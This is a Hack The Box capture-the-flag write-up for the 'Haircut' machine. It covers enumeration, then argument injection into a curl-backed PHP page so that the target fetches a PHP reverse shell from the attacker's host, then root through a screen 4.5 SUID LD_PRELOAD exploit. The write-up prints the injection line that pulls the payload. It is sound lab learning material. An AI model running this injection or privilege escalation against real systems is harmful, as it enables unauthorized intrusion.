# HAIRCUT | 10.10.10.24

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.24
    
### Open Ports and Their Services

* 22 - SSH - OpenSSH 7.2p2 Ubuntu
* 80 - HTTP - nginx 1.10.0

## Services Enumeration

### 22 - SSH

Like most hack the boxes, this port is open, sometimes for future use, sometimes for no reason at all. I'll move on until it becomes useful.

### 80 - HTTP - nginx 1.10.0

The main page is a rather stretched out image of a glamourous lady:

![](img/port-80.png)

Looks like I'll have to do some directory busting:

    gobuster dir -u http://10.10.10.24 -t 50 -x html,txt,php -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt | tee gobuster.log
    
This webserver has a penchant for stretched out images on random webpages:

![](img/carrie-curl.png)
![](img/sea.png)

This gobuster search seemed to be getting nowhere until I by chance decided to also search for php extensions (as I had already sussed out that the typical extension used was html); there is an `exposed.php` directory available:

![](img/exposed-php.png)

Let's see what it has to offer us:

![](img/test.png)

OK, it seems to run a cURL command on a webpage, and I guess the clue was staring me in the face the whole time:

![](img/curl.png)

This got me thinking I should try command injection of some sort, so I first tried adding a semicolon and then `whoami`, but there is some filtering going on because received a snarky message:

![](img/filter.png)

Same with `&&` and others like it. But since I can see this is running curl, and I know from the gobuster search that there is an `uploads` dir, let's see if I can make the page download a php reverse shell to that dir, then all I should have to do is execute it to get a shell.

## Exploitation

I am using the standard php-reverse-shell that you can find in the Kali repos. I host it on my machine and then inject the `-o` flag with the desired file location and point it at my webserver:

    -o /var/www/hrml/uploads/koopa.php http://10.10.14.21:8080/koopa.php
    
Now, I should just need to have a listener running, and then navigate to that php file, and hopefully I get a shell out of it:

![](img/www-data-shell.png)

Excellent! I have a shell as www-data, but I can read the flag so here it is:

![](img/user-flag.png)

## User Enumeration

I brought over linpeas to see what I could discover, and there were a couple potential privesc vectors.

* SUID binary - `/usr/bin/screen`:

![](img/SUID-screen.png)

* MYSQL creds in maria's tasks folder:

![](img/tasks.png)

## Privilege Escalation

I was able to connect to the MySQL server using those credentials, but I was unable to escalate my privileges; I tried executing a shell command but it runs as my current user, even though my mySQL user is root@localhost.

That leaves the SUID binary exploit. I'm not too familiar with screen, but it is a terminal multiplexer utility, similar to Tmux. Since it deals with interactive shells, if there is a vulnerability then it may be able to be exploited. My first stop for SUID binaries is always [GTFObins](https://gtfobins.github.io), but in this case that will not help me. So the next thing is to look for vulnerabilities in the version number, which is 4.5.

    searchsploit screen 4.5
    
![](img/searchsploit.png)

This exploit abuses 'LD_PRELOAD' to call a malicious library to get a root shell. It is a classic Linux privesc technique that I learned to do manually, but I am lazy so I'll use the shell script included in searchsploit. Step 1 is to get it over to the machine, then I'll probably have to set is as executable, and then I guess I just run it....

![](img/fail.png)

OK so that didn't go well, at all. I will have to reset the machine and try the steps myself, which I guess I should have done from the start. At least I have that exploit as a step by step guide.

So, I'ma level with you: Running the exploit on it's own didn't work. Compiling on my (Arch) system did not work either. Running the exploit manually also did not work. First I was lucky enough to stumble on a clue that fixed a 'cc1' bug I encountered while I tried to compile the exploit on the machine. Originally I was unable to compile on the machine due to an 'execvp not found error'. I learned that it was because there was literally a dot (.) in the $PATH; once I removed that, I could compile.

Then, after getting the shell and malicious library to compile, and even getting the sticky bit set on the shell, when I executed it I was still the www-data user. The only thing that worked for me was to change the `"/bin/sh, NULL, NULL` to just `"/bin/bash -p"`. The '-p' is important as it retains the permissions of the user calling it. I was just not able to become root using /bin/sh.

![](img/working-shell.png)

After figuring all that out over many attempts, I finally escalated to root:

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

Once again I've chosen a box that perhaps did not work as expected due to it being a few years old now, or maybe because I'm running Arch, but it took a lot of running around and consulting writeups to make sure I wasn't missing anything. It turns out I had to add my own finding to the exploit that it appears others did not. But really that makes sense, as everyone's environment is not 100% identical. Just have to keep at it until stuff works I guess.

Steps taken:

* find exposed.php on website
* use command/argument injection to upload php reverse shell
* exploit shared object injection vuln in SUID binary to escalate to root
